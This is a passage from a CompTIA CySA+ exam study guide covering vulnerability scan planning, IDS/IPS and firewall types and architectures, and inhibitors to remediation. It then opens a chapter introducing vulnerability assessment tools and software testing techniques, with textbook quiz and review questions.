process, there are some risks to note:
• A false sense of security can be introduced because
scans are not error free.
• Many tools rely on a database of known
vulnerabilities and are only as valid as the latest
update.
• Identifying vulnerabilities does not in and of itself
reduce your risk or improve your security.
Vulnerability Feed
Vulnerability feeds are RSS feeds dedicated to the
sharing of information about the latest vulnerabilities.
Subscribing to these feeds can enhance the knowledge of
the scanning team and can keep the team abreast of the
latest issues. For example, the National Vulnerability
Database is the U.S. government repository of standardsbased vulnerability management data represented using
the Security Content Automation Protocol (SCAP)
(covered in Chapter 14).
Scope
The scope of a scan defines what will be scanned and
what type of scan will be performed. It defines what
areas of the infrastructure will be scanned, and this part
of the scope should therefore be driven by where the
assets of concern are located. Limiting the scan areas
helps ensure that accidental scanning of assets and
devices not under the direct control of the organization
does not occur (because it could cause legal issues).
Scope might also include times of day when scanning
should not occur.
In the OpenVAS vulnerability scanner, you can set the
scope by setting the plug-ins and the targets. Plug-ins
define the scans to be performed, and targets specify the
machines. Figure 3-1 shows where plug-ins are chosen,
and Figure 3-2 shows where the targets are set.
Figure 3-1 Selecting Plug-ins in OpenVAS
Figure 3-2 Selecting Targets in OpenVAS
Credentialed vs. Non-credentialed
Another decision that needs to be made before
performing a vulnerability scan is whether to perform a
credentialed scan or a non-credentialed scans. A
credentialed scan is a scan that is performed by
someone with administrative rights to the host being
scanned, while a non-credentialed scan is performed
by someone lacking these rights.
Non-credentialed scans generally run faster and require
less setup but do not generate the same quality of
information as a credentialed scan. This is because
credentialed scans can enumerate information from the
host itself, whereas non-credentialed scans can only look
at ports and only enumerate software that will respond
on a specific port. Credentialed scanning also has the
following benefits:
• Operations are executed on the host itself rather
than across the network.
• A more definitive list of missing patches is
provided.
• Client-side software vulnerabilities are uncovered.
• A credentialed scan can read password policies,
obtain a list of USB devices, check antivirus
software configurations, and even enumerate
Bluetooth devices attached to scanned hosts.
Figure 3-3 shows that when you create a new scan policy
in Nessus, one of the available steps is to set credentials.
Here you can see that Windows credentials are chosen as
the type, and the SMB account and password are set.
Figure 3-3 Setting Credentials for a Scan in Nessus
Server-based vs. Agent-based
Vulnerability scanners can use agents that are installed
on the devices, or they can be agentless. While many
vendors argue that using agents is always best, there are
advantages and disadvantages to both, as presented in
Table 3-2.
Table 3-2 Server-Based vs. Agent-Based Scanning
Some scanners can do both agent-based and serverbased scanning (also called agentless or sensor-based
scanning). For example, Figure 3-4 shows the Nessus
templates library with both categories of templates
available.
Figure 3-4 Nessus Template Library
Internal vs. External
Scans can be performed from within the network
perimeter or from outside the perimeter. This choice has
a big effect on the results and their interpretation.
Typically the type of scan is driven by what the tester is
looking for. If the tester’s area of interest is
vulnerabilities that can be leveraged from outside the
perimeter to penetrate the perimeter, then an external
scan is in order. In this type of scan, either the sensors
of the appliance are placed outside the perimeter or, in
the case of software running on a device, the device itself
is placed outside the perimeter.
On the other hand, if the tester’s area of interest is
vulnerabilities that exist within the perimeter—that is,
vulnerabilities that could be leveraged by outsiders who
have penetrated the perimeter or by malicious insiders
(your own people)—then an internal scan is indicated.
In this case, either the sensors of the appliance are
placed inside the perimeter or, in the case of software
running on a device, the device itself is placed inside the
perimeter.
Special Considerations
Just as the requirements of the vulnerability
management program were defined in the beginning of
the process, scanning criteria must be settled upon
before scanning begins. This will ensure that the proper
data is generated and that the conditions under which
the data will be collected are well understood. This will
result in a better understanding of the context in which
the data was obtained and better analysis. Some of the
criteria that might be considered are described in the
following sections.
Types of Data
The types of data with which you are concerned should
have an effect on how you run the scan. Many tools offer
the capability to focus on certain types of vulnerabilities
that relate specifically to certain data types.
Technical Constraints
In some cases the scan will be affected by technical
constraints. Perhaps the way in which you have
segmented the network caused you to have to run the
scan multiple times from various locations in the
network. You will also be limited by the technical
capabilities of the scan tool you use.
Workflow
Workflow can also influence the scan. You might be
limited to running scans at certain times because it
negatively affects workflow. While security is important
it isn’t helpful if it detracts from business processes that
keep the organization in business.
Sensitivity Levels
Scanning tools have sensitivity level settings that impact
both the number of results and the tool’s judgment of the
results. Most systems assign a default severity level to
each vulnerability. In some cases, security analysts may
find that certain events that the system is tagging as
vulnerabilities are actually not vulnerabilities but that
the system has mischaracterized them. In other cases, an
event might be a vulnerability but the severity level
assigned is too extreme or not extreme enough. In that
case the analyst can either dismiss the vulnerability,
which means the system stops reporting it, or manually
define a severity level for the event that is more
appropriate. Keep in mind that these systems are not
perfect.
Sensitivity also refers to how deeply a scan probes each
host. Scanning tools have templates that can be used to
perform certain types of scans. These are two of the most
common templates in use:
• Discovery scans: These scans are typically used
to create an asset inventory of all hosts and all
available services.
• Assessment scans: These scans are more
comprehensive than discovery scans and can
identify misconfigurations, malware, application
settings that are against policy, and weak
passwords. These scans have a significant impact
on the scanned device.
Figure 3-5 shows the All Templates page in Nessus, with
scanning templates like the ones just discussed.
Figure 3-5 Scanning Templates in Nessus
Regulatory Requirements
Does the organization operate in an industry that is
regulated? If so, all regulatory requirements must be
recorded, and the vulnerability assessment must be
designed to support all requirements. The following are
some examples of industries in which security
requirements exist:
• Finance (for example, banks and brokerages)
• Medical (for example, hospitals, clinics, and
insurance companies)
• Retail (for example, credit card and customer
information)
Legislation such as the following can affect organizations
operating in these industries:
• Sarbanes-Oxley Act (SOX): The Public
Company Accounting Reform and Investor
Protection Act of 2002, more commonly known as
the Sarbanes-Oxley Act (SOX), affects any
organization that is publicly traded in the United
States. It controls the accounting methods and
financial reporting for the organizations and
stipulates penalties and even jail time for
executive officers who fail to comply with its
requirements.
• Health Insurance Portability and
Accountability Act (HIPAA): HIPAA, also
known as the Kennedy-Kassebaum Act, affects all
healthcare facilities, health insurance companies,
and healthcare clearing houses. It is enforced by
the Office of Civil Rights (OCR) of the Department
of Health and Human Services (HHS). It provides
standards and procedures for storing, using, and
transmitting medical information and healthcare
data. HIPAA overrides state laws unless the state
laws are stricter. This act directly affects the
security of protected health information (PHI).
• Gramm-Leach-Bliley Act (GLBA) of 1999:
The Gramm-Leach-Bliley Act (GLBA) of 1999
affects all financial institutions, including banks,
loan companies, insurance companies, investment
companies, and credit card providers. It provides
guidelines for securing all financial information
and prohibits sharing financial information with
third parties. This act directly affects the security
of personally identifiable information (PII).
• Payment Card Industry Data Security
Standard (PCI DSS): PCI DSS v3.2.1,
developed in 2019, is the latest version of the PCI
DSS standard as of this writing. It encourages and
enhances cardholder data security and facilitates
the broad adoption of consistent data security
measured globally. Table 3-3 shows a high-level
overview of the PCI DSS standard.
Table 3-3 High-Level Overview of PCI DSS
Segmentation
Segmentation is the process of dividing a network at
either Layer 2 or Layer 3. When VLANs are used, there is
segmentation at both Layer 2 and Layer 3, and with IP
subnets, there is segmentation at Layer 3. Segmentation
is usually done for one or both of the following reasons:
• To create smaller, less congested subnets
• To create security borders
In either case, segmentation can affect how you conduct
a vulnerability scan. By segmenting critical assets and
resources from less critical systems, you can restrict the
scan to the segments of interest, reducing the time to
conduct a scan while reducing the amount of irrelevant
data. This is not to suggest that you should not scan the
less critical parts of the network; it’s just that you can
adopt a less robust schedule for those scans.
Intrusion Prevention System (IPS), Intrusion
Detection System (IDS), and Firewall Settings
The settings that exist on the security devices will impact
the scan and in many cases are the source of a technical
restraint, as mentioned earlier. Scans might be restricted
by firewall settings and the scan can cause alerts to be
generated by your intrusion devices. Let’s talk a bit more
about these devices.
Vulnerability scanners are not the only tools used to
identify vulnerabilities. The following systems should
also be implemented as a part of a comprehensive
solution.
IDS/IPS
While you can use packet analyzers to manually monitor
the network for issues during environmental
reconnaissance, a less labor-intensive and more efficient
way to detect issues is through the use of intrusion
detection systems (IDSs) and intrusion prevention
systems (IPSs). An IDS is responsible for detecting
unauthorized access or attacks against systems and
networks. It can verify, itemize, and characterize threats
from outside and inside the network. Most IDSs are
programmed to react in certain ways in specific
situations. Event notification and alerts are crucial to an
IDS. They inform administrators and security
professionals when and where attacks are detected. IDS
implementations are furthered divided into the following
categories:
• Signature based: This type of IDS analyzes
traffic and compares it to attack or state patterns,
called signatures, that reside within the IDS
database. An IDS is also referred to as a misusedetection system. Although this type of IDS is very
popular, it can only recognize attacks as compared
with its database and is only as effective as the
signatures provided. Frequent database updates
are necessary. There are two main types of
signature-based IDSs:
• Pattern matching: The IDS compares traffic
to a database of attack patterns. The IDS
carries out specific steps when it detects traffic
that matches an attack pattern.
• Stateful matching: The IDS records the
initial operating system state. Any changes to
the system state that specifically violate the
defined rules result in an alert or notification
being sent.
• Anomaly-based: This type of IDS analyzes
traffic and compares it to normal traffic to
determine whether said traffic is a threat. It is also
referred to as a behavior-based, or profile-based,
system. The problem with this type of system is
that any traffic outside expected norms is
reported, resulting in more false positives than
you see with signature-based systems. There are
three main types of anomaly-based IDSs:
• Statistical anomaly-based: The IDS
samples the live environment to record
activities. The longer the IDS is in operation,
the more accurate the profile that is built.
However, developing a profile that does not
have a large number of false positives can be
difficult and time-consuming. Thresholds for
activity deviations are important in this IDS.
Too low a threshold results in false positives,
whereas too high a threshold results in false
negatives.
• Protocol anomaly-based: The IDS has
knowledge of the protocols it will monitor. A
profile of normal usage is built and compared
to activity.
• Traffic anomaly-based: The IDS tracks
traffic pattern changes. All future traffic
patterns are compared to the sample. Changing
the threshold reduces the number of false
positives or negatives. This type of filter is
excellent for detecting unknown attacks, but
user activity might not be static enough to
effectively implement this system.
• Rule or heuristic based: This type of IDS is an
expert system that uses a knowledge base, an
inference engine, and rule-based programming.
The knowledge is configured as rules. The data
and traffic are analyzed, and the rules are applied
to the analyzed traffic. The inference engine uses
its intelligent software to “learn.” When
characteristics of an attack are met, they trigger
alerts or notifications. This is often referred to as
an IF/THEN, or expert, system.
An application-based IDS is a specialized IDS that
analyzes transaction log files for a single application.
This type of IDS is usually provided as part of an
application or can be purchased as an add-on.
An IPS is a system responsible for preventing attacks.
When an attack begins, an IPS takes actions to contain
the attack. An IPS, like an IDS, can be network or host
based. Although an IPS can be signature or anomaly
based, it can also use a rate-based metric that analyzes
the volume of traffic as well as the type of traffic. In most
cases, implementing an IPS is more costly than
implementing an IDS because of the added security
needed to contain attacks compared to the security
needed to simply detect attacks. In addition, running an
IPS is more of an overall performance load than running
an IDS.
HIDS/NIDS
The most common way to classify an IDS is based on its
information source: network based or host based. The
most common IDS, the network-based IDS (NIDS),
monitors network traffic on a local network segment. To
monitor traffic on the network segment, the network
interface card (NIC) must be operating in promiscuous
mode—a mode in which the NIC process all traffic and
not just the traffic directed to the host. A NIDS can only
monitor the network traffic. It cannot monitor any
internal activity that occurs within a system, such as an
attack against a system that is carried out by logging on
to the system’s local terminal. A NIDS is affected by a
switched network because generally a NIDS monitors
only a single network segment. A host-based IDS (HIDS)
is an IDS that is installed on a single host and protects
only that host.
Firewall Rule-Based and Logs
The network device that perhaps is most connected with
the idea of security is the firewall. Firewalls can be
software programs that are installed over server
operating systems, or they can be appliances that have
their own operating system. In either case, the job of
firewalls is to inspect and control the type of traffic
allowed. Firewalls can be discussed on the basis of their
type and their architecture. They can also be physical
devices or exist in a virtualized environment. The
following sections look at them from all angles.
Firewall Types
When we discuss types of firewalls, we are focusing on
the differences in the way they operate. Some firewalls
make a more thorough inspection of traffic than others.
Usually there is trade-off in the performance of the
firewall and the type of inspection it performs. A deep
inspection of the contents of each packet results in the
firewall having a detrimental effect on throughput,
whereas a more cursory look at each packet has
somewhat less of an impact on performance. It is
therefore important to carefully select what traffic to
inspect, keeping this trade-off in mind.
Packet-filtering firewalls are the least detrimental to
throughput because they inspect only the header of a
packet for allowed IP addresses or port numbers.
Although even performing this function slows traffic, it
involves only looking at the beginning of the packet and
making a quick allow or disallow decision. Although
packet-filtering firewalls serve an important function,
they cannot prevent many attack types. They cannot
prevent IP spoofing, attacks that are specific to an
application, attacks that depend on packet
fragmentation, or attacks that take advantage of the TCP
handshake. More advanced inspection firewall types are
required to stop these attacks.
Stateful firewalls are aware of the proper functioning of
the TCP handshake, keep track of the state of all
connections with respect to this process, and can
recognize when packets that are trying to enter the
network don’t make sense in the context of the TCP
handshake. For example, a packet should never arrive at
a firewall for delivery and have both the SYN flag and the
ACK flag set unless it is part of an existing handshake
process, and it should be in response to a packet sent
from inside the network with the SYN flag set. This is the
type of packet that the stateful firewall would disallow. A
stateful firewall also has the ability to recognize other
attack types that attempt to misuse this process. It does
this by maintaining a state table about all current
connections and the status of each connection process.
This allows it to recognize any traffic that doesn’t make
sense with the current state of the connection. Of course,
maintaining this table and referencing it cause this
firewall type to have more effect on performance than
does a packet-filtering firewall.
Proxy firewalls actually stand between each connection
from the outside to the inside and make the connection
on behalf of the endpoints. Therefore, there is no direct
connection. The proxy firewall acts as a relay between
the two endpoints. Proxy firewalls can operate at two
different layers of the OSI model.
Circuit-level proxies operate at the session layer (Layer
5) of the OSI model. They make decisions based on the
protocol header and session layer information. Because
they do not do deep packet inspection (at Layer 7, the
application layer), they are considered application
independent and can be used for wide ranges of Layer 7
protocol types. A SOCKS firewall is an example of a
circuit-level proxy firewall. It requires a SOCKS client on
the computers. Many vendors have integrated their
software with SOCKS to make using this type of firewall
easier.
Application-level proxies perform deep packet
inspection. This type of firewall understands the details
of the communication process at Layer 7 for the
application of interest. An application-level firewall
maintains a different proxy function for each protocol.
For example, for HTTP, the proxy can read and filter
traffic based on specific HTTP commands. Operating at
this layer requires each packet to be completely opened
and closed, so this type of firewall has the greatest
impact on performance.
Dynamic packet filtering does not describe a type of
firewall; rather, it describes functionality that a firewall
might or might not possess. When an internal computer
attempts to establish a session with a remote computer,
it places both a source and destination port number in
the packet. For example, if the computer is making a
request of a web server, because HTTP uses port 80, the
destination is port 80. The source computer selects the
source port at random from the numbers available above
the well-known port numbers (that is, above 1023).
Because predicting what that random number will be is
impossible, creating a firewall rule that anticipates and
allows traffic back through the firewall on that random
port is impossible.
A dynamic packet-filtering firewall keeps track of that
source port and dynamically adds a rule to the list to
allow return traffic to that port.
A kernel proxy firewall is an example of a fifthgeneration firewall. It inspects a packet at every layer of
the OSI model but does not introduce the same
performance hit as an application-level firewall because
it does this at the kernel layer. It also follows the proxy
model in that it stands between the two systems and
creates connections on their behalf.
Firewall Architecture
Whereas the type of firewall speaks to the internal
operation of the firewall, the architecture refers to the
way in which the firewall or firewalls are deployed in the
network to form a system of protection. This section
looks at the various ways firewalls can be deployed and
the names of these various configurations.
A bastion host might or might not be a firewall. The term
actually refers to the position of any device. If it is
exposed directly to the Internet or to any untrusted
network, it is called a bastion host. Whether it is a
firewall, a DNS server, or a web server, all standard
hardening procedures become even more important for
these exposed devices. Any unnecessary services should
be stopped, all unneeded ports should be closed, and all
security patches must be up to date. These procedures
are referred to as “reducing the attack surface.”
A dual-homed firewall is a firewall that has two network
interfaces: one pointing to the internal network and
another connected to the untrusted network. In many
cases, routing between these interfaces is turned off. The
firewall software allows or denies traffic between the two
interfaces, based on the firewall rules configured by the
administrator. The danger of relying on a single dualhomed firewall is that it provides a single point of failure.
If this device is compromised, the network is
compromised also. If it suffers a denial-of-service (DoS)
attack, no traffic can pass. Neither of these is a good
situation. In some cases, a firewall may be multihomed.
One popular type is the three-legged firewall. This
configuration has three interfaces: one connected to the
untrusted network, one to the internal network, and the
last one to a part of the network called a demilitarized
zone (DMZ). A DMZ is a portion of the network where
systems will be accessed regularly from an untrusted
network. These might be web servers or an e-mail server,
for example. The firewall can be configured to control the
traffic that flows between the three networks, but it is
important to be somewhat careful with traffic destined
for the DMZ and to treat traffic to the internal network
with much more suspicion.
Although the firewalls discussed thus far typically
connect directly to an untrusted network (at least one
interface does), a screened host is a firewall that is
between the final router and the internal network. When
traffic comes into the router and is forwarded to the
firewall, it is inspected before going into the internal
network.
A screened subnet takes this concept a step further. In
this case, two firewalls are used, and traffic must be
inspected at both firewalls to enter the internal network.
It is called a screen subnet because there is a subnet
between the two firewalls that can act as a DMZ for
resources from the outside world. In the real world, these
various firewall approaches are mixed and matched to
meet requirements, so you might find elements of all
these architectural concepts applied to a specific
situation.
INHIBITORS TO
REMEDIATION
In some cases, there may be issues that make
implementing a particular solution inadvisable or
impossible. Some of these inhibitors to remediation are
as follows:
• Memorandum of understanding (MOU):
An MOU is a document that, while not legally
binding, indicates a general agreement between
the principals to do something together. An
organization may have MOUs with multiple
organizations, and MOUs may in some instances
contain security requirements that inhibit or
prevent the deployment of certain measures.
• Service-level agreement (SLA): An SLA is a
document that specifies a service to be provided
by a party, the costs of the service, and the
expectations of performance. These contracts may
exist with third parties from outside the
organization and between departments within an
organization. Sometimes these SLAs may include
specifications that inhibit or prevent the
deployment of certain measures.
• Organizational governance: Organizational
governance refers to the process of controlling an
organization’s activities, processes, and
operations. When the process is unwieldy, as it is
in some very large organizations, the application
of countermeasures may be frustratingly slow.
One of the reasons for including upper
management in the entire process is to use the
weight of authority to cut through the red tape.
• Business process interruption: The
deployment of mitigations cannot be done in such
a way that business operations and processes are
interrupted. Therefore, the need to conduct these
activities during off-hours can also be a factor that
impedes the remediation of vulnerabilities.
• Degrading functionality: Some solutions
create more issues than they resolve. In some
cases, it may impossible to implement mitigation
because it would break mission-critical
applications or processes. The organization may
need to research an alternative solution.
• Legacy systems: Legacy systems are those that
are older and may be less secure than newer
systems. Some of these older system are no longer
supported and are not receiving updates. In many
cases, organizations have legacy systems
performing critical operations and the enterprise
cannot upgrade those systems for one reason or
another. It could be that the current system
cannot be upgraded because it would be
disruptive to sales or marketing. Sometimes
politics prevents these upgrades. In some cases
the money is just not there for the upgrade. For
whatever reason, the inability to upgrade is an
inhibitor to remediation.
• Proprietary systems: In some cases, solutions
have been developed by the organization that do
not follow standards and are proprietary in
nature. In this case the organization is responsible
for updating the systems to address security
issues. Many times this does not occur. For these
types of systems, the upgrade path is even more
difficult because performing the upgrade is not
simply a matter of paying for the upgrade and
applying the upgrade. The work must be done by
the programmers in the organization that
developed the solution (if they are still around).
Obviously the inability to upgrade is an inhibitor
to remediation.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep practice test software.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 3-4 lists a reference of these key topics and the
page numbers on which each is found.
Table 3-4 Key Topics
DEFINE KEY TERMS
asset criticality
passive vulnerability scanning
active vulnerability scanning
enumeration
true positive
false positive
true negative
false negative
configuration baseline
patching
hardening
compensating controls
risk acceptance
vulnerability feed
scope
credentialed scan
non-credentialed scan
external scan
internal scan
memorandum of understanding (MOU)
service-level agreement (SLA)
legacy systems
proprietary systems
REVIEW QUESTIONS
1. ____________________ describes the relative
value of an asset to the organization.
2. List at least one question that should be raised to
determine asset criticality.
3. Nessus Network Monitor is an example of a(n)
_____________ scanner.
4. Match the following terms with their definition.
5. ____________________ are security settings
that are required on devices of various types.
6. Place the following patch management life cycle
steps in order.
• Install the patches in the live environment.
• Determine the priority of the patches and
schedule the patches for deployment.
• Ensure that the patches work properly.
• Test the patches.
7. When you are encrypting sensitive data, you are
implementing a(n) _________________.
8. List at least two logical hardening techniques.
9. Match the following risk-handling techniques with
their definitions.
10. List at least one risk to scanning.
Chapter 4. Analyzing
Assessment Output
This chapter covers the following topics related
to Objective 1.4 (Given a scenario, analyze the
output from common vulnerability assessment
tools) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Web application scanner: Covers the OWASP
Zed Attack Proxy (ZAP), Burp Suite, Nikto, and
Arachni scanners
• Infrastructure vulnerability scanner: Covers
the Nessus, OpenVAS, and Qualys scanners
• Software assessment tools and techniques:
Explains static analysis, dynamic analysis, reverse
engineering, and fuzzing
• Enumeration: Describes Nmap, hping, active vs.
passive enumeration, and Responder
• Wireless assessment tools: Covers Aircrackng, Reaver, and oclHashcat
• Cloud infrastructure assessment tools:
Covers ScoutSuite, Prowler, and Pacu
When assessments are performed there will be data that
is gathered that must be analyzed. The format of the
output generated by the various tools used to perform
the vulnerability assessment may be intuitive, but in
many cases it is not. Analysts must be able to read and
correctly interpret the output to identify issues that may
exist. This chapter is dedicated to analyzing vulnerability
assessment output.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these six self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 4-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 4-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a type of proactive
monitoring and uses external agents to run scripted
transactions against an application?
a. RUM
b. Synthetic transaction monitoring
c. Reverse engineering
d. OWASP
2. Which of the following is an example of a cloudbased vulnerability scanner?
a. OpenVAS
b. Qualys
c. Nikto
d. NESSUS
3. Which step in the software development life cycle
(SDLC) follows the design step?
a. Gather requirements
b. Certify/accredit
c. Develop
d. Test/validate
4. Which of the following is the process of discovering
and listing information?
a. Escalation
b. Discovery
c. Enumeration
d. Penetration
5. Which of the following is a set of command-line
tools you can use to sniff WLAN traffic?
a. hping3
b. Aircrack-ng
c. Qualys
d. Reaver
6. Which of the following is a data collection tool that
allows you to use longitudinal survey panels to
track and monitor the cloud environment?
a. Prowler
b. ScoutSuite
c. Pacu
d. Mikto
FOUNDATION TOPICS
WEB APPLICATION
SCANNER
Web vulnerability scanners focus on discovering
vulnerabilities in web applications. These tools can
operate in two ways: synthetic transaction monitoring or
real user monitoring. In synthetic transaction
monitoring, preformed (synthetic) transactions are
performed against the web application in an automated
fashion, and the behavior of the application is recorded.
In real user monitoring, real user transactions are
monitored while the web application is live.
Synthetic transaction monitoring, which is a type
of proactive monitoring, uses external agents to run
scripted transactions against a web application. This type
of monitoring is often preferred for websites and
applications. It provides insight into the application’s
availability and performance and warns of any potential
issue before users experience any degradation in
application behavior. For example, Microsoft’s System
Center Operations Manager (SCOM) uses synthetic
transactions to monitor databases, websites, and TCP
port usage.
In contrast, real user monitoring (RUM), which is a
type of passive monitoring, captures and analyzes every
transaction of every web application or website user.
Unlike synthetic transaction monitoring, which attempts
to gain performance insights by regularly testing
synthetic interactions, RUM cuts through the guesswork,
seeing exactly how users are interacting with the
application.
Many web application scanners are available. These tools
scan an application for common security issues with
cookie management, PHP scripts, SQL injections, and
other problems. Some examples of these tools are
covered in this section.
Burp Suite
The Burp Suite is a suite of tools, one of which can be
used for testing web applications. It can scan an
application for vulnerabilities and can also be used to
crawl an application (to discover content). This
commercial software is available for Windows, Linux,
and macOS. It can also be used for exploiting
vulnerabilities. For more information, see
https://portswigger.net/burp.
OWASP Zed Attack Proxy (ZAP)
The Open Web Application Security Project (OWASP)
produces an interception proxy called OWASP Zed
Attack Proxy (ZAP). It performs many of the same
functions as Burp, and so it also falls into the exploit
category. It can monitor the traffic between a client and a
server, crawl the application for content, and perform
vulnerability scans. For more information, see
https://owasp.org/www-project-zap/.
Nikto
Nikto is a vulnerability scanner that is dedicated to web
servers. It is designed for Linux but can be run in
Windows through a Perl interpreter. This tool is not
stealthy, but it is a fast scanner. Everything it does is
recorded in your logs. It generates a lot of information,
much of it normal or informational. It is a command-line
tool that is often run from within a Kali Linux server and
preinstalled with more than 300 penetration-testing
programs. For more information, see
https://tools.kali.org/information-gathering/nikto.
Arachni
Arachni is a Ruby framework for assessing the security
of a web application. It is often used by penetration
testers. It is open source, works with all major operating
systems (Windows, macOS, and Linux), and is
distributed via portable packages that allow for instant
deployment. Arachni can be used either at the command
line or via the web interface, shown in Figure 4-1.
Figure 4-1 Arachni
INFRASTRUCTURE
VULNERABILITY SCANNER
An infrastructure vulnerability scanner probes for a
variety of security weaknesses, including
misconfigurations, out-of-date software, missing
patches, and open ports. These solutions can be on
premises or cloud based.
Cloud-based vulnerability scanning is a service
performed from the vendor’s cloud and is a good
example of Software as a Service (SaaS). The benefits
here are the same as the benefits derived from any SaaS
offering: the subscriber does not have to provide
equipment, and the service makes no footprint in the
local network. Figure 4-2 shows a premises-based
approach to vulnerability scanning, and Figure 4-3
shows a cloud-based solution. In the premises-based
approach, all the hardware and/or software vulnerability
scanners and associated components are installed on the
client premises, while in the cloud-based approach, the
vulnerability management platform is hosted in the
cloud by the provider. Vulnerability scanners for external
vulnerability assessments are located at the solution
provider’s site, with additional scanners on the client
premises.
Figure 4-2 Premises-Based Scanning
Figure 4-3 Cloud-Based Scanning
The following are the advantages of the cloud-based
approach:
• Installation costs are low because there is no
installation and configuration for the client to
complete.
• Maintenance costs are low because there is only
one centralized component to maintain, and it is
maintained by the vendor (not the end client).
• Upgrades are included in a subscription.
• Costs are distributed among all customers.
• It does not require the client to provide onsite
equipment.
However, there is a considerable disadvantage to the
cloud-based approach: Whereas premises-based
deployments store data findings at the organization’s
site, in a cloud-based deployment, the data is resident
with the provider. This means the customer is dependent
on the provider to ensure the security of the vulnerability
data. Now let’s look at some specific tools.
Nessus
One of the most widely used vulnerability scanners is
Nessus Professional, a proprietary tool developed by
Tenable Network Security. It is free of charge for
personal use in a non-enterprise environment. By
default, Nessus Professional starts by listing at the top of
the output the issues found on a host that are rated with
the highest severity, as shown in Figure 4-4.
Figure 4-4 Example Nessus Output
For the computer scanned in Figure 4-4, you can see that
there is one high-severity issue (the default password for
a Firebird database located on the host), and there are
five medium-level issues, including two SSL certificates
that cannot be trusted and a remote desktop man-in-themiddle attack vulnerability. For more information, see
https://www.tenable.com/products/nessus.
OpenVAS
As you might suspect from the name, the OpenVAS tool
is open source. It was developed from the Nessus code
base and is available as a package for many Linux
distributions. The scanner is accompanied with a
regularly updated feed of network vulnerability tests
(NVT). It uses the Greenbone console, shown in Figure
4-5. For more information, see
https://www.openvas.org/.
Figure 4-5 OpenVAS
Qualys
Qualys is an example of a cloud-based vulnerability
scanner. Sensors are placed throughout the network, and
they upload data to the cloud for analysis. Sensors can be
implemented as dedicated appliances or as software
instances on a host. A third option is to deploy sensors as
images on virtual machines. For more information, see
https://www.qualys.com/.
SOFTWARE ASSESSMENT
TOOLS AND TECHNIQUES
Many organizations create software either for customers
or for their own internal use. When software is
developed, the earlier in the process security is
considered, the less it will cost to secure the software. It
is best for software to be secure by design. Secure coding
standards are practices that, if followed throughout the
software development life cycle (SDLC), help to
reduce the attack surface of an application.
In Chapter 9, “Software Assurance Best Practices,” you
will learn about the SDLC, a set of ordered steps to help
ensure that software is developed to enhance both
security and functionality. As a quick preview, the SDLC
steps are listed here:
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and
configuration management/replacement
This section concentrates on Steps 5 and 7, which is
where testing of the software occurs. This testing is
covered in this chapter because it is a part of
vulnerability management. This testing or validation can
take many forms.
Static Analysis
Static code analysis is performed without the code
executing. Code review and testing must occur
throughout the entire SDLC. Code review and testing
must identify bad programming patterns, security
misconfigurations, functional bugs, and logic flaws.
Code review and testing in the planning and design
phases include architecture security reviews and threat
modeling. Code review and testing in the development
phase include static source code analysis and manual
code review and static binary code analysis and manual
binary review. Once an application is deployed, code
review and testing involve penetration testing,
vulnerability scanning, and fuzz testing.
Static code review can be done with scanning tools that
look for common issues. These tools can use a variety of
approaches to find bugs, including the following:
• Data flow analysis: This analysis looks at
runtime information while the software is in a
static state.
• Control flow graph: A graph of the components
and their relationships can be developed and used
for testing by focusing on the entry and exit points
of each component or module.
• Taint analysis: This analysis attempts to identify
variables that are tainted with user-controllable
input.
• Lexical analysis: This analysis converts source
code into tokens of information to abstract the
code and make it easier to manipulate for testing
purposes.
Code review is the systematic investigation of the code
for security and functional problems. It can take many
forms, from simple peer review to formal code review.
There are two main types of reviews:
• Formal review: This is an extremely thorough,
line-by-line inspection, usually performed by
multiple participants using multiple phases. This
is the most time-consuming type of code review
but the most effective at finding defects.
• Lightweight: This type of code review is much
more cursory than a formal review. It is usually
done as a normal part of the development process.
It can happen in several forms:
• Pair programming: Two coders work side by
side, checking one another’s work as they go.
• Email: Code is emailed around to colleagues
for them to review when time permits.
• Over the shoulder: Coworkers review the
code while the author explains his or her
reasoning.
• Tool-assisted: Perhaps the most efficient
method, this method uses automated testing
tools.
While code review is most typically performed on inhouse applications, it may be warranted in other
scenarios as well. For example, say that you are
contracting with a third party to develop a web
application to process credit cards. Considering the
sensitive nature of the application, it would not be
unusual for you to request your own code review to
assess the security of the product.
In many cases, more than one tool should be used in
testing an application. For example, an online banking
application that has had its source code updated should
undergo both penetration testing with accounts of
varying privilege levels and a code review of the critical
models to ensure that defects there do not exist.
Dynamic Analysis
Dynamic analysis is testing performed while the
software is running. This testing can be performed
manually or by using automated testing tools. There are
two general approaches to dynamic testing:
• Synthetic transaction monitoring: A type of
proactive monitoring, often preferred for websites
and applications. It provides insight into the
application’s availability and performance,
warning of any potential issue before users
experience any degradation in application
behavior. It uses external agents to run scripted
transactions against an application. For example,
Microsoft’s System Center Operations Manager
(SCOM) uses synthetic transactions to monitor
databases, websites, and TCP port usage.
• Real user monitoring (RUM): A type of
passive monitoring that captures and analyzes
every transaction of every application or website
user. Unlike synthetic monitoring, which attempts
to gain performance insights by regularly testing
synthetic interactions, RUM cuts through the
guesswork by analyzing exactly how your users
are interacting with the application.
Reverse Engineering
In 1990, the Institute of Electrical and Electronics
Engineers (IEEE) defined reverse engineering as “the
process of analyzing a subject system to identify the
system’s components and their interrelationships, and to
create representations of the system in another form or
at a higher level of abstraction,” where the “subject
system” is the end product of software development.
Reverse engineering techniques can be applied in several
areas, including the study of the security of in-house
software. In Chapter 16, “Applying the Appropriate
Incident Response Procedure,” you’ll learn how reverse
engineering is applied to the incident response
procedure. In Chapter 12, “Implementing Configuration
Changes to Existing Controls to Improve Security,” you’ll
learn how reverse engineering applies to the malware
analysis process. The techniques you will learn about in
